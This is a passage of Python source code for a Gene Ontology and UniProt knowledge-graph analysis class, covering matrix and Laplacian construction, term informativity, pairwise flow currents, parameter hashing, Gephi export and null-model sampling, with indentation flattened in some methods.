    # build order matters: structure -> adjacency/laplacian -> reach ->
    # (optional ultraspecific filtering) -> laplacians -> inflation
    self.annotome_access_and_structure()
    self.get_go_adjacency_and_laplacian()
    self.get_go_reach()
    if self.ultraspec_cleaned:
        self.filter_out_too_specific()
    self.get_laplacians()
    self.inflate_matrix_and_indexes()

    # persist everything so fast_load() can resurrect this exact state
    self._dump_statics()
    self.dump_core()
    self._dump_matrices()
    self._dump_informativities()
    self._dump_inflated_elements()

    # trim the requested background to the UPs actually known to the
    # annotome; the background may be plain ids or (id, weight) pairs
    if self._background:
        if _is_int(self._background[0]):
            self._background = list(set(self.known_up_ids).intersection(set(self._background)))
        else:
            self._background = [(_id, _weight)
                                for _id, _weight in self._background
                                if _id in self.known_up_ids]
    else:
        # no background supplied: sample from all known UPs
        self._background = list(self.known_up_ids)

    log.info('Finished rebuilding the GO Interface object %s', self.pretty_time())
def fast_load(self):
    """
    Rapidly resurrects the InterfaceClass Instance based on parameters provided
    upon construction. If parameters are mismatched, raises exceptions signalling which
    parameter was mismatched. Trims the background provided upon construction down to
    what can actually be sampled (self._background).

    :raise Exception: wrong filtering namespace parameter
    :raise Exception: wrong correction factor parameter
    :raise Exception: wrong ultraspec cleaned parameter
    :raise Exception: wrong ultraspec level parameter
    """
    # compare the persisted construction parameters against the current ones
    namespace_filter, initial_set, correction_factor, ultraspec_cleaned, ultraspec_lvl = \
        self._undump_statics()

    if self.go_namespace_filter != namespace_filter:
        log.critical("Wrong Filtering attempted to be recovered from storage.\n"
                     "\tsaved: %s\n"
                     "\tcurrently active: %s" % (namespace_filter, self.go_namespace_filter))
        raise Exception(
            "Wrong Filtering attempted to be recovered from storage")
    if self.correction_factor != correction_factor:
        log.critical("Wrong correction factor attempted to be recovered from storage")
        raise Exception(
            "Wrong correction factor attempted to be recovered from storage")
    if self.ultraspec_cleaned != ultraspec_cleaned:
        log.critical(
            "Ultraspecific terms leveling state is not the same in the database as requested")
        raise Exception(
            "Ultraspecific terms leveling state is not the same in the database as requested")
    if self.ultraspec_lvl != ultraspec_lvl:
        log.critical(
            "Ultraspecific terms leveling cut-off is not the same in the database as requested")
        raise Exception(
            "Ultraspecific terms leveling cut-off is not the same in the database as requested")

    self._undump_core()

    log.info("_background: %d, entity_2_terms_neo4j_ids %s" % (len(self._background),
                                                               len(self.known_up_ids)))

    # trim the background to known UPs (same logic as in full_rebuild);
    # the background may be plain ids or (id, weight) pairs
    if self._background:
        if _is_int(self._background[0]):
            self._background = list(set(self.known_up_ids).intersection(
                set(self._background)))
        else:
            self._background = [(_id, _weight)
                                for _id, _weight in self._background
                                if _id in self.known_up_ids]
    else:
        self._background = list(self.known_up_ids)

    self._undump_matrices()
    self._undump_informativities()
    self._undump_inflated_elements()
def annotome_access_and_structure(self, ontology_source=('Gene Ontology')):
"""
Loads the relationship betweenm the UNIPROTS and annotome as one giant dictionary,
then between the GO terms themselves
:param ontology_source:
:return:
"""
all_nodes_dict, edges_list = DatabaseGraph.parse_knowledge_entity_net()
term_counter = 0
self._limiter_reachable_nodes_dict = defaultdict(lambda: (set(), set(), set(), set()))
# basically (pure up, out reg, pure down, in_reg)
for node_id, node_obj in all_nodes_dict.items():
# uniprot parse
if list(node_obj.labels)[0] == 'UNIPROT':
self.up_neo4j_id_2_leg_id_disp_name[node_id] = [node_obj['legacyID'],
node_obj['displayName']]
# ontology parse
else:
if ontology_source \
and node_obj['source'] not in ontology_source:
continue
if self.go_namespace_filter \
and node_obj['Namespace'] not in self.go_namespace_filter:
continue
self.neo4j_id_2_display_name[node_id] = node_obj['displayName']
self.neo4j_id_2_legacy_id[node_id] = node_obj['legacyID']
self.legacy_id_2_neo4j_id[node_obj['legacyID']] = node_id
self.all_nodes_neo4j_ids.append(node_id) # there are also nodes that are annotated by GO
self.mat_idx_2_note_id[term_counter] = node_id
self.node_id_2_mat_idx[node_id] = term_counter
term_counter += 1
for rel_obj in edges_list:
start_id = rel_obj.start_node.id
end_id = rel_obj.end_node.id
# link uniprots with GO annotations
# except the linkage does not matter, because it can be linked by other sources
if ontology_source and all_nodes_dict[end_id]['source'] not in ontology_source:
continue
if ontology_source and all_nodes_dict[start_id]['parse_type'] == 'annotation' \
and all_nodes_dict[start_id]['source'] not in ontology_source:
continue
# Uniprot will always be first.
if self.go_namespace_filter \
and all_nodes_dict[end_id]['Namespace'] not in self.go_namespace_filter:
continue
# however, both annotations need to be of correct namespace.
if self.go_namespace_filter \
and all_nodes_dict[start_id]['parse_type'] == 'annotation'\
and all_nodes_dict[start_id]['Namespace'] not in self.go_namespace_filter:
continue
if rel_obj['parse_type'] == 'annotates':
self.term_2_entities_neo4j_ids[end_id].append(start_id) # because uniprots are first
self.entity_2_terms_neo4j_ids[start_id].append(end_id)
# link annotations between them:
else: # el_obj['parse_type'] == 'annotation_relationship':
# for that we actually will need to build a more complicated
# OPTIMIZE: to match the previous way it functioned we would have needed to
# more up only, not down/sideways. Basically find all the UPs and run the cycle
# of rel>GO>rel>GO>rel>GO maps until we are out of Uniprots.
# OPTIMIZE: that would also allow us to eliminate the overly complex
# self.get_go_reach
# That would define:
# - self._limiter_go_2_up_reachable_nodes
# - self._limiter_go_2_up_step_reachable_nodes
# - self._limiter_up_2_go_reachable_nodes
# - self._limiter_up_2_go_step_reachable_nodes
# - GO2_Pure_Inf
# - _limiter_go_2_weighted_ent
# The final decision is that to save the time we will stick with what
# there was already before.
if rel_obj.type in self._go_up_types:
self._limiter_reachable_nodes_dict[start_id][0].add(end_id)
self._limiter_reachable_nodes_dict[end_id][2].add(start_id)
elif rel_obj.type in self._go_reg_types:
self._limiter_reachable_nodes_dict[start_id][1].add(end_id)
self._limiter_reachable_nodes_dict[end_id][3].add(start_id)
self._limiter_reachable_nodes_dict = dict(self._limiter_reachable_nodes_dict)
for key in self._limiter_reachable_nodes_dict.keys():
payload = self._limiter_reachable_nodes_dict[key]
self._limiter_reachable_nodes_dict[key] = (list(payload[0]),
list(payload[1]),
list(payload[2]),
list(payload[3]))
self.term_2_entities_neo4j_ids = dict(self.term_2_entities_neo4j_ids)
self.entity_2_terms_neo4j_ids = dict(self.entity_2_terms_neo4j_ids)
self.known_up_ids = self.entity_2_terms_neo4j_ids.keys()
def get_go_adjacency_and_laplacian(self, include_reg=True):
"""
Builds Undirected and directed adjacency matrices for the GO set and
:param include_reg: if True, the regulation set is included into the matrix
:warning: if the parameter above is set to False, get_GO_reach module will be
unable to function.
"""
def build_adjacency():
"""
Builds undirected adjacency matrix for the GO transitions
"""
base_matrix = lil_matrix((len(self.all_nodes_neo4j_ids), len(self.all_nodes_neo4j_ids)))
# REFACTOR: [BKI normalization] "package" should be a named tuple
for node, package in self._limiter_reachable_nodes_dict.items():
fw_nodes = package[0]
if include_reg:
fw_nodes += package[1]
for node2 in fw_nodes:
idx = (self.node_id_2_mat_idx[node], self.node_id_2_mat_idx[node2])
base_matrix[idx] = 1
idx = (idx[1], idx[0])
base_matrix[idx] = 1
self.adjacency_matrix = copy(base_matrix)
def build_dir_adj():
"""
Builds directed adjacency matrix for the GO transitions
"""
base_matrix = lil_matrix((len(self.all_nodes_neo4j_ids), len(self.all_nodes_neo4j_ids)))
for node, package in self._limiter_reachable_nodes_dict.items():
fw_nodes = package[0]
if include_reg:
fw_nodes += package[1]
for node2 in fw_nodes:
idx = (self.node_id_2_mat_idx[node], self.node_id_2_mat_idx[node2])
base_matrix[idx] = 1
self.dir_adj_matrix = copy(base_matrix)
build_adjacency()
build_dir_adj()
def calculate_informativity(self, number, key=None):
"""
returns an entropy given by a number of equi-probable events, where event is the number.
:param number:
"""
# REFACTOR: [Better weights]: rewrite informativity/weight calculation according to a
# loadable policy function
if not self.total_entropy:
self.total_entropy = - \
math.log(1. / len(self.known_up_ids), 2)
if number < 1.0:
# It actually possible now, the results just won't be used anymore
log.debug("Term (%s) without reach (%.2f) encountered in informativity calculation "
% (key, number))
return 10 * self.total_entropy
# raise Exception("Wrong value (%.2f) provided for entropy computation of %s" % (number,
# key)
if number == 1.0:
return 2 * self.total_entropy
return pow(-self.correction_factor[0] * self.total_entropy /
math.log(1 / float(number), 2), self.correction_factor[1])
# REFACTOR: [Maintenability]: method is excessively complex (cyc. complexity ~ 18).
    def get_go_reach(self):
        """
        Recovers by how many different uniprots each GO term is reached, both in
        distance-agnostic and distance-specific terms.

        Fills in:
         - self._limiter_go_2_up_reachable_nodes: term -> uniprots it (transitively) annotates
         - self._limiter_go_2_up_step_reachable_nodes: term -> {distance: [uniprots]}
         - self._limiter_up_2_go_reachable_nodes / _step_reachable_nodes: inverted maps
         - self.GO2_Pure_Inf and self._limiter_go_2_weighted_ent: per-term informativities

        :raise Exception: if the reaches are not equivalent
        :raise Exception: if null section in a non-nul patch
        """
        def verify_equivalence_of_reaches(step_reach, reach):
            """
            Sanity check: the flat reach and the step-annotated reach must cover the same
            number of uniprots for every term.

            :param step_reach: term -> {uniprot: distance}
            :param reach: term -> [uniprots]
            :raise Exception: if the reaches are not equivalent
            """
            dict_len = {key: [len(val), len(list(step_reach[key].keys()))]
                        for key, val in reach.items()}
            for key, val in dict_len.items():
                if val[1] != val[0]:
                    log.critical(
                        'Reach exploration results not equivalent! Please report the error.')
                    raise Exception(
                        'Reach exploration results not equivalent! Please report the error.')
        def special_sum(_val_dict, filter_function=lambda x: x + 1.0):
            """
            Special sum used for the computation of staged informativity of different terms

            :param _val_dict: {distance: [uniprots reached at that distance]}
            :param filter_function: weighting applied to each distance before summation
            :raise Exception:
            """
            summer = 0
            for key, val_list in _val_dict.items():
                summer += filter_function(key) * len(val_list)
            return summer
        # all-pairs shortest paths over the directed GO-to-GO transition graph;
        # unreachable pairs (inf) are zeroed so the matrix can be treated as sparse
        dir_reg_path = shortest_path(self.dir_adj_matrix, directed=True, method='D')
        dir_reg_path[np.isinf(dir_reg_path)] = 0.0  # potential problem from pycharm
        dir_reg_path = lil_matrix(dir_reg_path)
        # Load all the GOs that can potentially be reached
        self._limiter_go_2_up_reachable_nodes = dict((el, []) for el in list(self._limiter_reachable_nodes_dict.keys()))
        # Load all the UPs that are reached directly from the GO nodes.
        self._limiter_go_2_up_reachable_nodes.update(self.term_2_entities_neo4j_ids)
        # directly annotated uniprots start at distance 0 from their term
        pre_go2up_step_reachable_nodes = dict((key, dict((v, 0) for v in val))
                                              for key, val in self._limiter_go_2_up_reachable_nodes.items())
        # when called on possibly un-encoutenred items, anticipate a default
        # value of 100 000
        # Now just scan vertical columns and add UP terms attached
        for idx1, idx2 in zip(list(dir_reg_path.nonzero()[0]),
                              list(dir_reg_path.nonzero()[1])):
            # add UPs annotated by a node to all more general terms.
            self._limiter_go_2_up_reachable_nodes[self.mat_idx_2_note_id[idx2]] +=\
                self._limiter_go_2_up_reachable_nodes[self.mat_idx_2_note_id[idx1]]
            if dir_reg_path[idx1, idx2] < 1.0:
                log.critical("null in non-null patch")
                raise Exception("null in non-null patch")
            # shift every distance recorded for the source term by the term-to-term path length
            step_reach_upgrade = dict(
                (key, val + dir_reg_path[idx1, idx2])
                for key, val in pre_go2up_step_reachable_nodes[self.mat_idx_2_note_id[idx1]].items())
            # keep the shortest known distance per uniprot (100000 acts as +infinity default)
            for k, v in step_reach_upgrade.items():
                pre_go2up_step_reachable_nodes[
                    self.mat_idx_2_note_id[idx2]][k] = min(
                        pre_go2up_step_reachable_nodes[
                            self.mat_idx_2_note_id[idx2]].setdefault(
                                k, 100000), v)
        # deduplicate the accumulated flat reaches
        for key, val in self._limiter_go_2_up_reachable_nodes.items():
            self._limiter_go_2_up_reachable_nodes[key] = list(set(val))
        verify_equivalence_of_reaches(
            pre_go2up_step_reachable_nodes,
            self._limiter_go_2_up_reachable_nodes)
        # Now we need to invert the reach to get the set of all the primary and
        # derived GO terms that describe a UP
        self._limiter_up_2_go_reachable_nodes = dict(
            (key, []) for key in self.known_up_ids)
        self._limiter_up_2_go_step_reachable_nodes = dict(
            (key, defaultdict(list)) for key in self.known_up_ids)
        self._limiter_go_2_up_step_reachable_nodes = dict(
            (key, defaultdict(list)) for key in list(pre_go2up_step_reachable_nodes.keys()))
        for key, val_dict in pre_go2up_step_reachable_nodes.items():
            for k, v in val_dict.items():
                self._limiter_go_2_up_step_reachable_nodes[key][v].append(k)
                self._limiter_up_2_go_step_reachable_nodes[k][v].append(key)
                self._limiter_up_2_go_reachable_nodes[k].append(key)
        # and finally we compute the pure and weighted informativity for each
        # term
        self.GO2_Pure_Inf = dict((key, self.calculate_informativity(len(val), key))
                                 for key, val in self._limiter_go_2_up_reachable_nodes.items())
        self._limiter_go_2_weighted_ent = dict((key, self.calculate_informativity(special_sum(val_dict)))
                                               for key, val_dict in self._limiter_go_2_up_step_reachable_nodes.items())
def get_laplacians(self):
"""
Recovers the Laplacian (information conductance) matrixes for the GO annotation terms.
For weighted laplacian, currently implements a Max-Ent with custom factor as transition
price.
:warning: for this method to function, get_GO reach function must be run first.
:warning: accounting for regulatory relation relation between the GO terms is performed
if has been done in the adjunction matrix computation
"""
base_matrix = -copy(self.dir_adj_matrix)
nz_list = copy(
list(zip(list(base_matrix.nonzero()[0]), list(base_matrix.nonzero()[1]))))
# REFACTOR: [Better weights]: change that to a version using a function to calculate the
# weights (weigting policy)
for idx1, idx2 in nz_list:
min_inf = min(
self.GO2_Pure_Inf[self.mat_idx_2_note_id[idx1]],
self.GO2_Pure_Inf[self.mat_idx_2_note_id[idx2]])
base_matrix[idx1, idx2] = -min_inf
base_matrix[idx2, idx1] = -min_inf
base_matrix[idx2, idx2] += min_inf
base_matrix[idx1, idx1] += min_inf
self.laplacian_matrix = base_matrix
def compute_uniprot_dict(self):
"""
Unused.
Computes the uniprot method required by a third-party method
:return:
"""
uniprot_dict = {}
for elt in self.up_neo4j_id_2_leg_id_disp_name.keys():
node = DatabaseGraph.get(elt, 'UNIPROT')
alt_id = node['legacyID']
uniprot_dict[alt_id] = (
elt, self.up_neo4j_id_2_leg_id_disp_name[elt][1]) # UP_Name
uniprot_dict[elt] = alt_id
pickle.dump(uniprot_dict, open(confs.Dumps.Up_dict_dump, 'wb'))
return uniprot_dict
def filter_out_too_specific(self):
"""
Filters out GO terms that are too specific and builds a directed, undirected adjacency
maps and laplacian.
"""
rep_val = self.calculate_informativity(self.ultraspec_lvl)
self.ultraspec_cleaned = True
ultraspec_go_terms = list(GO
for GO, reach
in self._limiter_go_2_up_reachable_nodes.items()
if len(reach) < self.ultraspec_lvl)
for GO in ultraspec_go_terms:
self.GO2_Pure_Inf[GO] = rep_val
def md5_hash(self):
"""
Return the MD hash of self to ensure that all the defining properties have been
correctly defined before dump/retrieval
"""
sorted_initset = sorted(self.node_id_2_mat_idx.keys())
data = [
sorted_initset,
self.go_namespace_filter,
self.correction_factor,
self.ultraspec_cleaned,
self.ultraspec_lvl,
confs.line_loss,
confs.use_normalized_laplacian,
confs.fraction_edges_dropped_in_laplacian]
md5 = hashlib.md5(json.dumps(data, sort_keys=True).encode('utf-8')).hexdigest()
log.debug("System md5 hashing done. hash: %s. parameters: \n"
"\t sorted init set hash: %s \n"
"\t bki environment paramters: %s|%s|%s|%s\n"
"\t line loss: %s\n"
"\t l_norm: %s\n"
"\t edge drop: %s\n"
% (md5,
hashlib.md5(json.dumps(sorted_initset, sort_keys=True).encode('utf-8')).hexdigest(),
self.go_namespace_filter,
self.correction_factor,
self.ultraspec_cleaned,
self.ultraspec_lvl,
confs.line_loss,
confs.use_normalized_laplacian,
confs.fraction_edges_dropped_in_laplacian))
return str(md5)
def active_sample_md5_hash(self, sparse_rounds):
"""
Performs a hash of characteristics of loaded primary hits list, secondary hits list,
and background with flow calculation methods. Basically, everything needed to know if a
random sample is relevant to the currently loaded sample
:param sparse_rounds: -1 if dense flow calculation, otherwise sparse sampling parameter
:return:
"""
sys_hash = self.md5_hash()
background = []
if self._background:
if _is_int(self._background[0]):
background = sorted(self._background)
else:
background = sorted(self._background, key=lambda x: x[1])
sample_chars = characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample,
sparse_rounds)
hashlib.md5(json.dumps(background, sort_keys=True).encode(
'utf-8')).hexdigest()
data = [
sys_hash,
background,
self._flow_calculation_method.__name__,
sparse_rounds,
sample_chars[0], sample_chars[1], sample_chars[2],
sample_chars[3], sample_chars[4], sample_chars[5],
sample_chars[6], sample_chars[7]
]
md5 = hashlib.md5(json.dumps(data, sort_keys=True).encode('utf-8')).hexdigest()
log.debug('Active sample md5 hashing done: %s. parameters: \n'
'\tsys_hash: %s\n'
'\tbackground hash: %s\n'
'\tflow policy: %s\n'
'\tsparse sampling: %s\n'
'\tmain sample chars: %d/%d/%s\n'
'\tsec sample chars: %d/%d/%s\n'
'\tsparse sampling: %d\n'
'\toverall hash: %s' % (md5,
sys_hash,
hashlib.md5(
json.dumps(background, sort_keys=True).encode(
'utf-8')).hexdigest(),
self._flow_calculation_method.__name__,
sparse_rounds,
sample_chars[0], sample_chars[1], sample_chars[2],
sample_chars[3], sample_chars[4], sample_chars[5],
sample_chars[6], sample_chars[7]))
return str(md5)
def set_flow_sources(self, sample, secondary_sample):
"""
Sets the sample to analyze - primary and secondary sources
:param sample: primary sample being loaded
:param secondary_sample: secondary sample being loaded (None if none)
:return:
"""
def _verify_uniprot_ids(id_weight_vector: List[Tuple[int, float]]):
uniprots = np.array(id_weight_vector)[:, 0].astype(np.int).tolist()
if not set(uniprots) <= self.known_up_ids:
log.warn('Following reached uniprots neo4j_ids were not retrieved upon the '
'circulation matrix construction: \n %s',
(set(uniprots) - self.known_up_ids))
_filter = [True
if uniprot in self.known_up_ids
else False
for uniprot in uniprots]
pre_return = np.array(id_weight_vector)[_filter, :].tolist()
return [(id, val) for id, val in pre_return]
self._active_weighted_sample = _verify_uniprot_ids(reduce_and_deduplicate_sample(sample))
self._active_up_sample = np.array(self._active_weighted_sample)[:, 0].tolist()
if secondary_sample is not None:
log.debug('debug: secondary_weight sample %s' % secondary_sample)
self._secondary_weighted_sample = \
_verify_uniprot_ids(reduce_and_deduplicate_sample(secondary_sample))
# KNOWNBUG: logic bug occurs if the ids supplied have no annotations in the db
log.debug('debug: secondary_weight sample %s' % np.array(
self._secondary_weighted_sample))
self._active_up_sample = list(set(self._active_up_sample
+ np.array(self._secondary_weighted_sample)[:, 0].tolist()))
def evaluate_ops(self, sparse_rounds=-1):
"""
Evaluate the number of pairs of nodes that wlll be used for flow calculation
:param sparse_rounds: sparse rounds parameter, if -1 will be considered dense
:return:
"""
log.debug('evaluate_ops call')
ro = sampling_policies.characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample,
-2)
eo = self._ops_evaluation_method(ro[0], ro[3], sparse_rounds)
log.debug('BKI ops evaluation: %s, %s, %s, %s' % (ro[0], ro[3], sparse_rounds, eo))
return eo
def reduce_ops(self, ops_limit):
"""
Evaluates the value of the sparse_round parameter need to keep the number of pairs of
nodes used for flow calculation under a given budget
:param ops_limit: node pair budget
:return:
"""
log.debug('reduce_ops call')
ro = sampling_policies.characterize_flow_parameters(self._active_weighted_sample,
self._secondary_weighted_sample,
-2)
op_r = self._ops_reduction_method(ro[0], ro[3], ops_limit)
log.debug('BKI ops reduction: %s, %s, %s, %s' % (ro[0], ro[3], ops_limit, op_r))
return op_r
def inflate_matrix_and_indexes(self):
"""
Performs the laplacian matrix inflation to incorporate the uniprots on which we
will be running the analysis
"""
# branching distribution: at least 10x the biggest conductivity of the
# system, unless too specific, in which case ~ specific level
self.binding_intensity = 10 * self.calculate_informativity(self.ultraspec_lvl)
fixed_index = self.laplacian_matrix.shape[0]
up2idxs = dict((UP, fixed_index + Idx)
for Idx, UP in enumerate(self.known_up_ids))
idx2ups = dict((Idx, UP) for UP, Idx in up2idxs.items())
self.inflated_laplacian = lil_matrix(
(self.laplacian_matrix.shape[0] + len(self.known_up_ids),
self.laplacian_matrix.shape[1] + len(self.known_up_ids)))
self.inflated_laplacian[:self.laplacian_matrix.shape[0], :self.laplacian_matrix.shape[1]] =\
self.laplacian_matrix
for uniprot in self.known_up_ids:
for go_term in self.entity_2_terms_neo4j_ids.get(uniprot, []): # should never hit the [] though
self.inflated_laplacian[
up2idxs[uniprot], up2idxs[uniprot]] += self.binding_intensity
self.inflated_laplacian[
self.node_id_2_mat_idx[go_term], self.node_id_2_mat_idx[go_term]] += self.binding_intensity
self.inflated_laplacian[
self.node_id_2_mat_idx[go_term], up2idxs[uniprot]] -= self.binding_intensity
self.inflated_laplacian[
up2idxs[uniprot], self.node_id_2_mat_idx[go_term]] -= self.binding_intensity
self.inflated_lbl2idx = copy(self.node_id_2_mat_idx)
self.inflated_lbl2idx.update(up2idxs)
self.inflated_idx2lbl = copy(self.mat_idx_2_note_id)
self.inflated_idx2lbl.update(idx2ups)
def set_uniprot_source(self, uniprots):
"""
Sets the deprecated_reached_uniprots_neo4j_id_list on which the circulation computation routines
will be performed by the otehr methods.Avoids passing as argument large lists of parameters.
:param uniprots: List of node IDs of the uniprots on which we would like to perform
current computations
:raise Warning: if the uniprots were not present in the set of GOs for which we
built the system or had no GO attached to them
"""
if not set(uniprots) <= self.known_up_ids :
na_set = set(uniprots) - self.known_up_ids
log.warning('%s uniprots out of %s either were not present in the constructions set '
'or have no GO terms attached to them.', len(na_set), len(set(uniprots)))
log.debug('full list of uniprots that cannot be analyzed: \n%s', na_set)
self._active_up_sample = [uniprot for uniprot in uniprots if uniprot in self.known_up_ids]
    def compute_current_and_potentials(
            self,
            memoized: bool = True,
            incremental: bool = False,  # This should always be false and was used in order to
                                        # resume the sampling
            cancellation: bool = False,
            sparse_rounds: int = -1,
            potential_dominated: bool = True):
        """
        Builds a conduction matrix that integrates uniprots, in order to allow an easier
        knowledge flow analysis

        :param memoized: if the tensions and individual relation matrices should be stored in
         the matrix and dumped at the end computation (required for submatrix re-computation)
        :param incremental: if True, all the circulation computation will be added to the
         existing ones. Useful for the computation of particularly big systems with
         intermediate dumps
        :param cancellation: divides the final current by #Nodes**2/2, i.e. makes the currents
         comparable between circulation systems of different sizes.
        :param sparse_rounds: if set to a positive integer the sampling will be sparse and
         not dense, i.e. instead of computation for each node pair, only an estimation will be
         made, equal to computing sparse sampling association with other randomly chosen nodes
        :param potential_dominated: if the total current is normalized to potential
        :return: adjusted conduction system
        """
        # NOTE(review): `self.current_accumulator == np.zeros((2, 2))` produces an
        # array/matrix whose truth value is ambiguous; this only works because
        # `not incremental` short-circuits in the documented incremental=False usage —
        # confirm before ever calling with incremental=True.
        if not incremental or self.current_accumulator == np.zeros((2, 2)):
            self.current_accumulator = lil_matrix(self.inflated_laplacian.shape)
            self.UP2UP_voltages = {}
            self.uniprots_2_voltage = {}
        # the flow policy decides which uniprot pairs get a current computation
        weighted_up_pairs = self._flow_calculation_method(self._active_weighted_sample,
                                                          self._secondary_weighted_sample,
                                                          sparse_rounds)
        # pairs in the list of pairs are now guaranteed to be weighted
        total_pairs = len(weighted_up_pairs)
        breakpoints = 300  # progress is logged every `breakpoints` pairs
        previous_time = time()
        for counter, (up_w_id_1, up_w_id_2) in enumerate(weighted_up_pairs):
            up_id_1, w_1 = up_w_id_1
            up_id_2, w_2 = up_w_id_2
            mean_weight = (w_1 + w_2) / 2.
            idx1, idx2 = (self.inflated_lbl2idx[up_id_1], self.inflated_lbl2idx[up_id_2])
            # restrict the computation to the two uniprots and every GO term either can reach
            pre_reach = self._limiter_up_2_go_reachable_nodes[up_id_1] + \
                self._limiter_up_2_go_reachable_nodes[up_id_2] + \
                [up_id_1] + [up_id_2]
            reach = [self.inflated_lbl2idx[label] for label in pre_reach]
            current_upper, potential_diff = cr.group_edge_current_with_limitations(
                inflated_laplacian=self.inflated_laplacian,
                idx_pair=(idx1, idx2),
                reach_limiter=reach)
            self.UP2UP_voltages[tuple(sorted((up_id_1, up_id_2)))] = potential_diff
            if potential_dominated:
                # normalize the current by the pair's potential difference when possible
                if potential_diff != 0:
                    current_upper = current_upper / potential_diff
                else:
                    log.warning('pairwise flow. On indexes %s %s potential difference is null. %s',
                                up_id_1, up_id_2, 'Tension-normalization was aborted')
            self.current_accumulator = self.current_accumulator + \
                cr.sparse_abs(current_upper) * mean_weight
            if counter % breakpoints == 0 and counter > 1:
                # TODO: [load bar] the internal loop load bar goes here
                compops = float(breakpoints) / (time() - previous_time)
                mins_before_termination = (total_pairs - counter) / compops // 60
                finish_time = datetime.datetime.now() + datetime.timedelta(minutes=mins_before_termination)
                log.info("thread hex: %s; progress: %s/%s, current speed: %.2f compop/s, "
                         "time remaining: "
                         "%.0f "
                         "min, finishing: %s "
                         % (self.thread_hex, counter, total_pairs, compops, mins_before_termination,
                            finish_time.strftime("%m/%d/%Y, %H:%M:%S")))
                previous_time = time()
        # only the upper triangle is kept: currents are symmetric per pair
        self.current_accumulator = triu(self.current_accumulator)
        if cancellation:
            self.current_accumulator /= float(total_pairs)
        index_current = cr.get_current_through_nodes(self.current_accumulator)
        log.info('current accumulator shape %s, sum %s',
                 self.current_accumulator.shape, np.sum(self.current_accumulator))
        self.node_current = dict((self.inflated_idx2lbl[idx], val)
                                 for idx, val in enumerate(index_current))
        if memoized:
            self._dump_memoized()
def format_node_props(self, node_current, limit=0.01):
"""
Formats the nodes for the analysis by in the knowledge_access_analysis module
:param node_current: Current through the GO nodes
:param limit: hard limit to go_namespace_filter out the GO terms with too little current
(compensates the minor currents in the gird)s
:return: {GO:[node current, pure GO informativity, Number of reachable nodes]}
"""
characterization_dict = {}
limiting_current = max(node_current.values()) * limit
log.debug('formatting node props with %.2f limiting current' % limiting_current)
for go_term in self.node_id_2_mat_idx.keys():
if node_current[go_term] > limiting_current:
characterization_dict[go_term] = [
node_current[go_term],
self.GO2_Pure_Inf[go_term],
len(self._limiter_go_2_up_reachable_nodes[go_term])]
# should never occur, unless single node is a massive outlier
if len(characterization_dict) < 2:
characterization_dict = self.format_node_props(node_current, limit/100)
return characterization_dict
    def export_conduction_system(self,
                                 p_value_dict: dict = None,
                                 output_location: str = ''):
        """
        Computes the conduction system of the GO terms and exports it to the GDF format
        and flushes it into a file that can be viewed with Gephi

        :param p_value_dict: {term id: (p-value, ...)} statistics per GO term; missing
         entries default to NaN tuples
        :param output_location: destination path; NewOutputs().GO_GDF_output when empty
        :raise Warning:
        """
        # column schema of the exported GDF node table
        node_char_names = [
            'Current',
            'Type',
            'Legacy_ID',
            'Names',
            'Pure_informativity',
            'Confusion_potential',
            'p-value',
            'p_p-value',
            'Source_W']
        node_char_types = [
            'DOUBLE',
            'VARCHAR',
            'VARCHAR',
            'VARCHAR',
            'DOUBLE',
            'DOUBLE',
            'DOUBLE',
            'DOUBLE',
            'DOUBLE']
        if p_value_dict is None:
            p_value_dict = defaultdict(lambda: (np.nan, np.nan, np.nan))
        # -log10 of a p-value; strings are passed through unchanged
        nan_neg_log10 = lambda x: x if type(x) is str else -np.log10(x)
        char_dict = {}
        # GO term rows
        # NOTE(review): both the 'p-value' and the 'p_p-value' columns read
        # p_value_dict[...][0]; confirm the second was not meant to read index 1.
        for GO in self.node_id_2_mat_idx.keys():
            char_dict[GO] = [str(self.node_current[GO]),
                             'GO',
                             self.neo4j_id_2_legacy_id[GO],
                             self.neo4j_id_2_display_name[GO].replace(',', '-'),
                             str(self.GO2_Pure_Inf[GO]),
                             str(len(self._limiter_go_2_up_reachable_nodes[GO])),
                             str(p_value_dict[int(GO)][0]),
                             str(nan_neg_log10(p_value_dict[int(GO)][0])),
                             '0']
        # uniprot rows: recover the signed source weight from the loaded samples
        for UP in self._active_up_sample:
            in_sample_weight = 1
            for node, weight in self._active_weighted_sample:
                if UP == node:
                    in_sample_weight = weight
            if self._secondary_weighted_sample is not None:
                # secondary-sample members carry a negated weight
                for node, weight in self._secondary_weighted_sample:
                    if UP == node:
                        in_sample_weight = -weight
            # NOTE(review): the '0.05'/'1.3' p-value columns for UPs are fixed
            # placeholders — presumably to keep UP nodes visible downstream; confirm.
            char_dict[UP] = [str(self.node_current[UP]),
                             'UP',
                             self.up_neo4j_id_2_leg_id_disp_name[UP][0],  # UP leg ID/name
                             str(self.up_neo4j_id_2_leg_id_disp_name[UP][1]).replace(',', '-'),
                             str(self.binding_intensity),
                             '1',
                             '0.05',
                             '1.3',
                             str(in_sample_weight)]
        if output_location == '':
            output_location = NewOutputs().GO_GDF_output
        gdf_exporter = GdfExportInterface(
            target_fname=output_location,
            field_names=node_char_names,
            field_types=node_char_types,
            node_properties_dict=char_dict,
            min_current=0.01,
            index_2_label=self.inflated_idx2lbl,
            label_2_index=self.inflated_lbl2idx,
            current_matrix=self.current_accumulator)
        # TODO: [Better stats]: twister compared to random sample?
        gdf_exporter.write()
    def randomly_sample(
            self,
            random_samples,
            sparse_rounds: int = -1,
            no_add=False,
            pool_no=None,
            sampling_policy=sampling_policies.matched_sampling,
            optional_sampling_param='exact'):
        """
        Randomly samples the set of deprecated_reached_uniprots_neo4j_id_list used to create the model.
        This is the null model creation routine: random samples matched to the active one
        are drawn, their flows computed, and the results stored in the samples database.

        :param random_samples: how many times we would like to sample each unirot number
        :param sparse_rounds: if we want to use sparse sampling
         (useful in case of large uniprot sets)
        :param no_add: if set to True, the result of sampling will not be added to the database
         of samples. Useful if re-running tests with similar parameters several times.
        :param pool_no: explicit sampling pool number (used for reporting/debugging)
        :param sampling_policy: sampling policy used
        :param optional_sampling_param: sampling policy optional argument
        """
        sample_chars = characterize_flow_parameters(self._active_weighted_sample,
                                                    self._secondary_weighted_sample, sparse_rounds)
        super_hash = sample_chars[7]
        log.info('Starting a random sampler: \n'
                 '\tsampling policy & optional param: %s/%s\n'
                 '\tflow policy: %s\n'
                 '\tsparse sampling: %s\n'
                 '\tmain sample chars: %d/%d/%s\n'
                 '\tsec sample chars: %d/%d/%s\n'
                 '\tsparse sampling: %d\t'
